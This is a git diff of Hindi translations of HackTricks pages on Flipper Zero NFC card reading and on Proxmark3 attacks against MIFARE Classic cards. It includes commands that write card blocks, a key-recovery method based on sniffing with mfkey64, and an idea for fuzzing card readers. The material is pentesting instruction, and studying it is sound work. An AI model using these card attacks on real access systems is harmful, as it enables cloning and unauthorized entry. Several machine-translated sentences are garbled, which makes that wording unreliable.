* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे संवेदनशीलता खोजें जो सबसे महत्वपूर्ण हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरी टेक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक, मुद्दों को खोजता है। [**इसे मुफ़्त में ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
वे सुरक्षित करने के लिए सबसे महत्वपूर्ण दुरुपयोग खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**यह नि: शुल्क ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -31,76 +31,61 @@ RFID और NFC के बारे में जानकारी के ल
## समर्थित NFC कार्ड <a href="#9wrzi" id="9wrzi"></a>
{% hint style="danger" %}
NFC कार्ड के अलावा Flipper Zero **कई अन्य प्रकार के High-frequency कार्ड** को भी समर्थित करता है जैसे कि कई **Mifare** Classic और Ultralight और **NTAG**।
NFC कार्ड के अलावा, फ्लिपर जीरो **उच्च आवृत्ति कार्ड** को समर्थन करता है जैसे कि कई **माइफेयर** क्लासिक और अल्ट्रालाइट और **एनटैग**।
{% endhint %}
नए प्रकार के NFC कार्ड समर्थित कार्डों की सूची में जोड़े जाएंगे। Flipper Zero निम्नलिखित **NFC कार्ड प्रकार A** (ISO 14443A) का समर्थन करता है:
नए प्रकार के NFC कार्ड समर्थित कार्डों की सूची में जोड़े जाएंगे। फ्लिपर जीरो निम्नलिखित **NFC कार्ड प्रकार A** (ISO 14443A) का समर्थन करता है:
* **बैंक कार्ड (EMV)** - केवल UID, SAK, और ATQA को सहेजे बिना पढ़ें
* **अज्ञात कार्ड** - (UID, SAK, ATQA) पढ़ें और एक UID की नकल करें।
* **बैंक कार्ड (ईएमवी)** — केवल UID, SAK, और ATQA पढ़ें बिना सहेजे
* **अज्ञात कार्ड** — (UID, SAK, ATQA) पढ़ें और एक UID का अनुकरण करें।
**NFC कार्ड प्रकार B, प्रकार F, और प्रकार V** के लिए, Flipper Zero एक UID को सहेजे बिना पढ़ सकता है
**NFC कार्ड प्रकार B, प्रकार F, और प्रकार V** के लिए, फ्लिपर जीरो एक UID पढ़ सकता है बिना इसे सहेजे
### NFC कार्ड प्रकार A <a href="#uvusf" id="uvusf"></a>
#### बैंक कार्ड (EMV) <a href="#kzmrp" id="kzmrp"></a>
#### बैंक कार्ड (ईएमवी) <a href="#kzmrp" id="kzmrp"></a>
Flipper Zero केवल एक UID, SAK, ATQA, और बैंक कार्ड पर संग्रहित डेटा को **सहेजे बिना** पढ़ सकता है।
फ्लिपर जीरो केवल एक UID, SAK, ATQA, और बैंक कार्ड पर स्टोर किए गए डेटा को **सहेजे बिना** पढ़ सकता है।
बैंक कार्ड पढ़ने की स्क्रीनबैंक कार्ड के लिए, Flipper Zero केवल डेटा को पढ़ सकता है **सहेजे और नकल नहीं करता**।
बैंक कार्ड पढ़ने की स्क्रीन बैंक कार्ड के लिए, फ्लिपर जीरो केवल डेटा पढ़ सकता है **बिना सहेजे और इसे अनुकरण करना**।
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=916&#x26;w=2662" alt=""><figcaption></figcaption></figure>
#### अज्ञात कार्ड <a href="#37eo8" id="37eo8"></a>
जब Flipper Zero **NFC कार्ड के प्रकार को निर्धारित करने में असमर्थ होता है**, तो केवल **UID, SAK, और ATQA** को **पढ़ा और सहेजा** जा सकता है
जब फ्लिपर जीरो **NFC कार्ड के प्रकार का निर्धारण करने में असमर्थ** होता है, तो केवल **UID, SAK, और ATQA** पढ़े और सहेजे जा सकते हैं
अज्ञात कार्ड पढ़ने की स्क्रीनअज्ञात NFC कार्ड के लिए, Flipper Zero केवल एक UID की नकल कर सकता है।
अज्ञात कार्ड पढ़ने की स्क्रीन अज्ञात NFC कार्ड के लिए, फ्लिपर जीरो केवल एक UID अनुकरण कर सकता है।
<figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=932&#x26;w=2634" alt=""><figcaption></figcaption></figure>
### NFC कार्ड प्रकार B, F, और V <a href="#wyg51" id="wyg51"></a>
**NFC कार्ड प्रकार B, F, और V** के लिए, Flipper Zero केवल एक UID को पढ़ सकता है और प्रदर्शित कर सकता है, इसे सहेजे बिना
**NFC कार्ड प्रकार B, F, और V** के लिए, फ्लिपर जीरो केवल एक UID पढ़ सकता है और इसे सहेजे बिना दिखा सकता है
<figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w
#### UID पढ़ना बनाम अंदर के डेटा को पढ़ना <a href="#reading-the-uid-vs-reading-the-data-inside" id="reading-the-uid-vs-reading-the-data-inside"></a>
<figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w=2704" alt=""><figcaption></figcaption></figure>
## क्रियाएँ
NFC के बारे में एक परिचय के लिए [**इस पृष्ठ को पढ़ें**](../../../radio-hacking/pentesting-rfid.md#high-frequency-rfid-tags-13.56-mhz)।
### पढ़ें
फ्लिपर जीरो **NFC कार्ड पढ़ सकता है**, हालांकि, यह **उन सभी प्रोटोकॉल को समझ नहीं सकता** जो ISO 14443 पर आधारित हैं। हालांकि, क्योंकि **UID एक निचले स्तर की विशेषता है**, आपको एक स्थिति में पाने की स्थिति में पाएंगे जब **UID पहले से पढ़ा गया हो, लेकिन उच्च स्तरीय डेटा स्थानांतरण प्रोटोकॉल अज्ञात हो**। आप उन प्राचीन पाठकों के लिए UID का उपयोग करने के लिए फ्लिपर का उपयोग करके UID पढ़, अनुकरण और मैन्युअल इनपुट कर सकते हैं।
#### UID पढ़ना बनाम अंदर के डेटा पढ़ना <a href="#reading-the-uid-vs-reading-the-data-inside" id="reading-the-uid-vs-reading-the-data-inside"></a>
<figure><img src="../../../.gitbook/assets/image (26).png" alt=""><figcaption></figcaption></figure>
फ्लिपर में, 13.56 मेगाहर्ट्ज़ टैग्स को दो हिस्सों में विभाजित किया जा सकता है:
फ्लिपर में, 13.56 मेगाहर्ट्ज टैग पढ़ने को दो भागों में विभाजित किया जा सकता है:
* **लो-स्तर पढ़ें** - केवल UID, SAK और ATQA पढ़ता है। फ्लिपर इस डेटा के आधार पर हाई-स्तर प्रोटोकॉल को अनुमानित करने की कोशिश करता है। इसमें आप 100% निश्चित नहीं हो सकते क्योंकि यह केवल कुछ कारकों पर आधारित एक अनुमान है।
* **हाई-स्तर पढ़ें** - एक विशिष्ट हाई-स्तर प्रोटोकॉल का उपयोग करके कार्ड की मेमोरी से डेटा पढ़ता है। इसमें Mifare Ultralight पर डेटा पढ़ना, Mifare Classic से सेक्टर पढ़ना या PayPass/Apple Pay से कार्ड की विशेषताओं को पढ़ना शामिल होगा।
* **निचले स्तर की पढ़ाई** — केवल UID, SAK, और ATQA पढ़ता है। फ्लिपर इस डेटा को कार्ड से पढ़ा गया उच्च स्तरीय प्रोटोकॉल के आधार पर अनुमान लगाने की कोशिश करता है। आप इसके साथ 100% निश्चित नहीं हो सकते, क्योंकि यह कुछ कारकों पर आधारित केवल एक अनुमान है।
* **उच्च स्तर की पढ़ाई** — एक विशिष्ट उच्च स्तरीय प्रोटोकॉल का उपयोग करके कार्ड की मेमोरी से डेटा पढ़ता है। यह Mifare Ultralight पर डेटा पढ़ना, Mifare Classic से सेक्टर पढ़ना, या PayPass/Apple Pay से कार्ड की विशेषताएँ पढ़ना होगा।
### विशिष्ट रीड
### विशेष रूप से पढ़ें
यदि फ्लिपर जीरो लो स्तरीय डेटा से कार्ड के प्रकार को खोजने में सक्षम नहीं है, तो `अतिरिक्त कार्रवाई` में आप `विशिष्ट कार्ड प्रकार पढ़ें` का चयन कर सकते हैं और **मैन्युअल** **रूप से कार्ड के प्रकार की घोषणा कर सकते हैं**।
यदि फ्लिपर जीरो निम्न स्तरीय डेटा से कार्ड के प्रकार को खोजने में सक्षम नहीं है, तो `अतिरिक्त क्रियाएँ` में आप `विशेष कार्ड प्रकार पढ़ें` चुन सकते हैं और **मैन्युअल** **रूप से इंडिकेट करें कि आप किस प्रकार का कार्ड पढ़ना चाहेंगे**।
#### EMV बैंक कार्ड (PayPass, payWave, Apple Pay, Google Pay) <a href="#emv-bank-cards-paypass-paywave-apple-pay-google-pay" id="emv-bank-cards-paypass-paywave-apple-pay-google-pay"></a>
#### ईएमवी बैंक कार्ड (PayPass, payWave, Apple Pay, Google Pay) <a href="#emv-bank-cards-paypass-paywave-apple-pay-google-pay" id="emv-bank-cards-paypass-paywave-apple-pay-google-pay"></a>
UID को पढ़ने के अलावा, आप एक बैंक कार्ड से बहुत सारा डेटा निकाल सकते हैं। आप **पूरी कार्ड नंबर** (कार्ड के सामने के 16 अंक), **मान्यता की तारीख**, और कुछ मामलों में यहां तक कि **मालिक का नाम** भी निकाल सकते हैं साथ ही **नवीनतम लेनदेनों की सूची**।\
हालांकि, आप इस तरीके से CVV पढ़ नहीं सकते हैं (कार्ड के पीछे के 3 अंक)। इसके अलावा, **बैंक कार्ड replay हमलों से सुरक्षित होते हैं**, इसलिए उसे फ्लिपर के साथ कॉपी करके उसे नकली बनाने का प्रयास करके कुछ खरीदने के लिए काम नहीं करेगा।
## संदर्भ
* [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे संदर्भ ढूंढें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव ध्रुवीकरण स्कैन चलाता है, आपकी पूरी टेक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक, मुद्दों की खोज करता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण देखने** या HackTricks को **PDF में डाउनलोड करने** की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।**
* **अपने हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स रेपो में पीआर जमा करके और हैकट्रिक्स-क्लाउड रेपो में पीआर जमा करके।
</details>
UID केवल पढ़ने के अलावा, आप एक बैंक कार्ड से बहुत

View file

@ -4,33 +4,33 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) में शामिल हों या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
िशेषताएं खोजें जो सबसे महत्वपूर्ण हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरी टेक स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक, मुद्दों को खोजता है। [**आज ही मुफ्त में इसे ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
े सुरक्षा गड़बड़ी खोजें जो सबसे महत्वपूर्ण हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**इसे मुफ्त में ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
## Proxmark3 के साथ RFID सिस्टमों को हमला करन
## Proxmark3 के साथ RFID सिस्टम का हमल
सबसे पहली चीज जो आपको करनी होगी, वह है [**Proxmark3**](https://proxmark.com) और [**सॉफ़्टवेयर और इसकी आवश्यकताएं स्थापित करें**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
पहली चीज जो आपको करनी होगी, वह है [**Proxmark3**](https://proxmark.com) और [**सॉफ़्टवेयर और इसकी आवश्यकताएं स्थापित करें**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)
### MIFARE Classic 1KB को हमला करन
### MIFARE Classic 1KB का हमल
इसमें **16 सेक्टर**ोते हैं, प्रत्येक में **4 ब्लॉक** होते हैं और प्रत्येक ब्लॉक में **16B** होते हैं। UID सेक्टर 0 ब्लॉक 0 में होता है (और इसे बदला नहीं जा सकता है)।\
प्रत्येक सेक्टर तक पहुंचने के लिए आपको **2 कुंजी** (**A** और **B**) की आवश्यकता होती है जो प्रत्येक सेक्टर के **ब्लॉक 3 में संग्रहीत** होती हैं (सेक्टर ट्रेलर)। सेक्टर ट्रेलर में **एक्सेस बिट्स** भी संग्रहीत होते हैं जो 2 कुंजियों का उपयोग करके प्रत्येक ब्लॉक पर **पढ़ने और लिखने** की अनुमति देते हैं।\
यदि आप पहली कुंजी को जानते हैं तो पढ़ने की अनुमति देने के लिए 2 कुंजियों का उपयोग करना उपयोगी है और यदि आप दूसरी कुंजी को जानते हैं तो लिखने की अनुमति देने के लिए। (उदाहरण के लिए)।
इसमें **16 सेक्टर** हैं, प्रत्येक में **4 ब्लॉक** हैं और प्रत्येक ब्लॉक में **16B** होता है। UID सेक्टर 0 ब्लॉक 0 में है (और इसे बदला नहीं जा सकता)।\
प्रत्येक सेक्टर तक पहुंचने के लिए आपको **2 कुंजियाँ** (**A** और **B**) चाहिए होती हैं जो **प्रत्येक सेक्टर के ब्लॉक 3 में** संग्रहीत होती हैं (सेक्टर ट्रेलर)। सेक्टर ट्रेलर में **एक्सेस बिट्स** संग्रहीत होते हैं जो 2 कुंजियों का उपयोग करके प्रत्येक ब्लॉक पर **पढ़ने और लिखने** की अनुमतियाँ देते हैं।\
यदि आप पहली को जानते हैं तो पढ़ने की अनुमति देने के लिए 2 कुंजियाँ उपयोगी होती हैं और यदि आप दूसरी को जानते हैं तो लिखने की अनुमति देने के लिए। (उदाहरण के लिए)।
कई हमले किए जा सकते हैं
कई हमले किए जा सकते हैं
```bash
proxmark3> hf mf #List attacks
@ -49,11 +49,11 @@ proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```
Proxmark3 के द्वारा अन्य कार्रवाई करने की अनुमति होती है, जैसे कि **टैग से रीडर संचार का अवरोधन** करके संवेदनशील डेटा खोजने का प्रयास करना। इस कार्ड में, आप संचार को स्निफ करके उपयोग किए गए कुंजी की गणना कर सकते हैं क्योंकि **क्रिप्टोग्राफिक प्रक्रियाएं कमजोर होती हैं** और सादा और चिपरण पाठ को जानते हुए आप इसे गणना कर सकते हैं (`mfkey64` टूल का उपयोग करके)।
Proxmark3 अन्य क्रियाएँ करने की अनुमति देता है जैसे **इकछापटिंग** एक **टैग से रीडर संचार** को जासूसी करने के लिए संवेदनशील डेटा खोजने की कोशिश करने के लिए। इस कार्ड में आप संचार को स्निफ कर सकते हैं और इस्तेमाल किया गया कुंजी की गणना कर सकते हैं क्योंकि **रहस्यात्मक प्रक्रियाएँ कमजोर हैं** और सादा और साइपर पाठ को जानते हुए आप इसे गणना कर सकते हैं (`mfkey64` उपकरण)।
### कच्चे आदेश
### कच्चे कमांड
आईओटी सिस्टम कभी-कभी **ब्रांडेड या गैर-वाणिज्यिक टैग्स** का उपयोग करते हैं। इस मामले में, आप Proxmark3 का उपयोग करके टैग्स को कस्टम **कच्चे आदेश भेजने** के लिए कर सकते हैं।
आईओटी सिस्टम कभी-कभी **गैर-ब्रांडेड या गैर-वाणिज्यिक टैग** का उपयोग करते हैं। इस मामले में, आप Proxmark3 का उपयोग करके टैग्स को अपने लिए **कस्टम कच्चे कमांड भेजने** के लिए कर सकते हैं।
```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
@ -63,31 +63,12 @@ No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
```
इस जानकारी के साथ आप कार्ड के बारे में और उसके साथ संवाद करने के तरीके के बारे में जानकारी खोजने की कोशिश कर सकते हैं। Proxmark3 को ऐसे रॉ आदेश भेजने की अनुमति देता है जैसे: `hf 14a raw -p -b 7 26`
इस जानकारी के साथ आप कार्ड के बारे में जानकारी खोजने का प्रयास कर सकते हैं और उसके साथ संवाद करने के तरीके के बारे में। Proxmark3 को रॉ आदेश भेजने की अनुमति देता है जैसे: `hf 14a raw -p -b 7 26`
### स्क्रिप्ट
Proxmark3 सॉफ़्टवेयर के साथ एक पूर्व लोड की गई सूची है जिसमें आप सरल कार्यों को करने के लिए उपयोग कर सकते हैं। पूरी सूची प्राप्त करने के लिए, `script list` आदेश का उपयोग करें। अगले, स्क्रिप्ट के नाम के बाद `script run` आदेश का उपयोग करें:
Proxmark3 सॉफ़्टवेयर के साथ एक पूर्व लोड की गई **स्वचालन स्क्रिप्ट** की सूची आती है जिन्हें आप सरल कार्यों को पूरा करने के लिए उपयोग कर सकते हैं। पूरी सूची प्राप्त करने के लिए, `script list` आदेश का उपयोग करें। अगले, स्क्रिप्ट के नाम के साथ `script run` आदेश का उपयोग करें:
```
proxmark3> script run mfkeys
```
आप एक स्क्रिप्ट बना सकते हैं ताकि आप **टैग रीडर** को **फज़ कर सकें**, इस प्रकार एक **मान्य कार्ड** के डेटा की प्रतिलिपि बनाएं और एक **लुआ स्क्रिप्ट** लिखें जो एक या एक से अधिक **रैंडम बाइट्स** को रैंडमाइज़ करता है और यह जांचता है कि क्या किसी भी आवृत्ति में **रीडर क्रैश** होता है।
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
जो सबसे महत्वपूर्ण हों उन खुदरा को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमला पट्टी का पता लगाता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी टेक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक, मुद्दों को खोजता है। [**इसे नि: शुल्क परीक्षण के लिए प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज ही।
{% embed url="https://www.intruder.io/?utm\_campaign=hacktricks&utm\_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
आप एक स्क्रिप्ट बना सकते हैं ताकि **टैग रीडर** को **फज़ किया** जा सके, तो केवल एक **वैध कार्ड** के डेटा की कॉपी करने के लिए एक **Lua स्क्रिप्ट** लिखें जो एक या एक से अधिक **रैंडम बाइट्स** को **रैंडमाइज़** करता है और किसी भी इटरेशन के साथ **रीडर क्रैश** की जांच करता है।

View file

@ -4,30 +4,18 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप अपनी **company का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी hacking tricks साझा करें.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को PDF में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
### नमस्ते!!
सबसे पहले, यह बताना आवश्यक है कि अन्य साइटों से शोध की गई तकनीकों के सभी **credits मूल लेखकों के हैं** (पृष्ठों में संदर्भ हैं). इंटरनेट की सुरक्षा में सुधार के लिए ज्ञान साझा करने वाले हर शोध को धन्यवाद.
सबसे पहले, यह दर्शाने की आवश्यकता है कि सभी **तकनीकों के श्रेय अन्य साइटों से अनुसंधान का** मूल लेखकों को है (पृष्ठों में संदर्भ हैं)। हर अनुसंधान को समझाने के लिए ज्ञान साझा करने वाले हर अनुसंधान को सम्मान।
